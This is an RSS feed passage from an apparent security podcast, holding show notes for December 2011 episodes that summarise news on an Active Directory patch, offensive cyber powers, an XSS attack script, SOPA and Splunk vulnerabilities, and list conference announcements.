<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://technet.microsoft.com/en-us/security/bulletin/ms11-095"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://technet.microsoft.com/en-us/security/bulletin/ms11-095</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update resolves a privately reported vulnerability in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS). The vulnerability could allow remote code execution if an attacker logs on to an Active Directory domain and runs a specially crafted application. To exploit this vulnerability, an attacker would first need to acquire credentials to log on to an Active Directory domain.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update is rated Important for Active Directory, ADAM, and AD LDS when installed on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 (except Itanium), Windows 7, and Windows Server 2008 R2 (except Itanium). For more information, see the subsection, Affected and Non-Affected Software, in this section.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security update addresses the vulnerability by changing the way that Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) handle objects in memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span><a href="http://www.wired.com/threatlevel/2011/12/internet-war-2/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/12/internet-war-2/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The House and Senate agreed to give the U.S. military the power to conduct &ldquo;offensive&rdquo; strikes online &mdash; including clandestine attacks, via a little-noticed provision in the military&rsquo;s 2012 funding bill.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The power, which was included in the House version but not the Senate version, was included in the final &ldquo;reconciled&rdquo; bill that is all but guaranteed to pass into law.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Congress affirms that the Department of Defense has the capability, and upon direction by the President may conduct offensive operations in cyberspace to defend our Nation, Allies and interests, subject to&ndash; (1) the policy principles and legal regimes that the Department follows for kinetic capabilities, including the law of armed conflict; and (2) the War Powers Resolution (50 U.S.C. 1541 et seq.).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While &ldquo;offensive&rdquo; action isn&rsquo;t defined, that&rsquo;s likely to include things like unleashing a worm like the Stuxnet worm that damaged Iran&rsquo;s nuclear centrifuges, hacking into another country&rsquo;s power grid to bring it down, disabling websites via denial-of-service attacks, or as the CIA has already done with some collateral damage, hacking into a forum where would-be terrorists meet in order to permanently disable it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/12/16/potent_xss_script/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/16/potent_xss_script/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker has published code for potent cross-site scripting attacks that he claims go beyond the usual cookie stealing and phishing for users&#39; private details.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cross-site scripting (XSS) flaws allow attackers to present content under their control in the context of a vulnerable yet trusted site, thus tricking marks into handing sensitive information to miscreants. As well as creating a means to present pop-ups that link to a hacker-controlled site, XSSes can also lead to cookie theft.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Niklas Femerstrand is the hacker who in October 2011 discovered that a debugging tool on the American Express website was</span><a href="http://www.theregister.co.uk/2011/10/07/amex_website_security_snafu/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">vulnerable to an XSS flaw</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. He developed an &quot;XSS on steroids&quot; script while researching a similar flaw on the website of an unnamed Swedish bank.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There are common myths about XSSes saying they can only be be used for phishing and cookie harvesting,&quot; he said. &quot;My code bursts those myths and is so the first way of transforming a &#39;non persistent&#39; XSS into a persistent state.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I have written self-aware code that recognizes its own presence and makes a local infection of its own payload into all links of a website presented to the infected visitor. This way the non-persistent XSS becomes persistent to the infected user. It also follows the user through page forms and sends interesting data to the attacker (usernames, passwords, credit card info),&quot; he added.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Femerstrand last week published his attack code on his website</span><a href="http://qnrq.se/eliminating-the-myths-of-xss-attacks"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wired.com/threatlevel/2011/12/sopa-vote-delayed/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/12/sopa-vote-delayed/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The House Judiciary Committee considering whether to send the Stop Online Piracy Act to the House floor abruptly adjourned Friday with no new vote date set &mdash; a surprise given that the bill looked certain to pass out of committee.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The committee&rsquo;s chairman and chief sponsor of the legislation, Rep. Lamar Smith (R-Texas), agreed to further explore a controversial provision that lets the Attorney General order changes to core internet infrastructure in order to stop copyright infringement.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Smith said the hearing would resume at the &ldquo;earliest practical day that Congress is in session.&rdquo; Hours later, &nbsp;Rep. Darrell Issa (R-California) tweeted that the committee would resume action Wednesday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The abrupt halt to Friday&rsquo;s proceeding, which followed a marathon-long, 11-hour hearing Thursday, was based on a motion from Rep. Jason Chaffetz (R-Utah). He urged Smith to postpone the session until technical experts could be brought in to testify whether altering the internet&rsquo;s domain-naming system to fight websites deemed &ldquo;dedicated&rdquo; to infringing activity would create security risks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just yesterday, Smith said that was not necessary, despite a signed letter by many of the internet&rsquo;s core engineers saying the bill&rsquo;s approach was technically flawed.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The legislation mandates that ISPs alter records in the net&rsquo;s system for looking up website names, known as DNS, so that users couldn&rsquo;t navigate to the site. Or, if ISPs choose not to introduce false information into DNS at the urging of the Justice Department, they instead would be required to employ some other method, such as deep-packet inspection, to prevent American citizens from visiting infringing sites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ISPs, could, for instance, adopt tactics used by the Great Chinese Firewall to sniff for traffic going to a blacklisted site and simply block it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.sec-1.com/blog/?p=233"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sec-1.com/blog/?p=233</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Gary O&rsquo;Leary-Steele</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Advisory: Multiple Splunk Vulnerabilities</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">crsf</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">remote exec</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">encoded directory traversal</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">free mode dont enforce authentication&#8230; whoops / password policy not enforced</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This aim of this project was to assess typical Splunk deployments for vulnerabilities that could be exploited by a malicious attacker paper: </span><a href="http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Multiple vulnerabilities were discovered that could be exploited to gain remote code execution as the root/localsystem user. A full description of the discovered vulnerabilities can be found here:</span><a href="http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Download</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vendor has patched the issue in version 4.2.5. Sec-1 would like to thank Splunk for their prompt and professional response.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-548-ms11-095-offensive-strikes-automated-bank-robbery-sopa-stoppa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3284/0/infosec-daily-podcast-episode-548.mp3" length="16792711" type="audio/mpeg" />
		<itunes:duration>0:34:32</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 548 for December 16, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 548 for December 16, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://technet.microsoft.com/en-us/security/bulletin/ms11-095
	This security update resolves a privately reported vulnerability in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS). The vulnerability could allow remote code execution if an attacker logs on to an Active Directory domain and runs a specially crafted application. To exploit this vulnerability, an attacker would first need to acquire credentials to log on to an Active Directory domain.
	This security update is rated Important for Active Directory, ADAM, and AD LDS when installed on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 (except Itanium), Windows 7, and Windows Server 2008 R2 (except Itanium). For more information, see the subsection, Affected and Non-Affected Software, in this section.
	The security update addresses the vulnerability by changing the way that Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) handle objects in memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
	&#8230;
	Source: http://www.wired.com/threatlevel/2011/12/internet-war-2/
	The House and Senate agreed to give the U.S. military the power to conduct &#8220;offensive&#8221; strikes online &#8212; including clandestine attacks, via a little-noticed provision in the military&#8217;s 2012 funding bill.
	The power, which was included in the House version but not the Senate version, was included in the final &#8220;reconciled&#8221; bill that is all but guaranteed to pass into law.
	Congress affirms that the Department of Defense has the capability, and upon direction by the President may conduct offe[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 547 &#8211; Naughty French, Visa, Ellen Scam, Big 5 &amp; Manning</title>
		<link>http://www.isdpodcast.com/episode-547-naughty-french-visa-ellen-scam-big-5-manning</link>
		<comments>http://www.isdpodcast.com/episode-547-naughty-french-visa-ellen-scam-big-5-manning#comments</comments>
		<pubDate>Fri, 16 Dec 2011 01:59:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3279</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 547 for December 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 547 for December 15, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
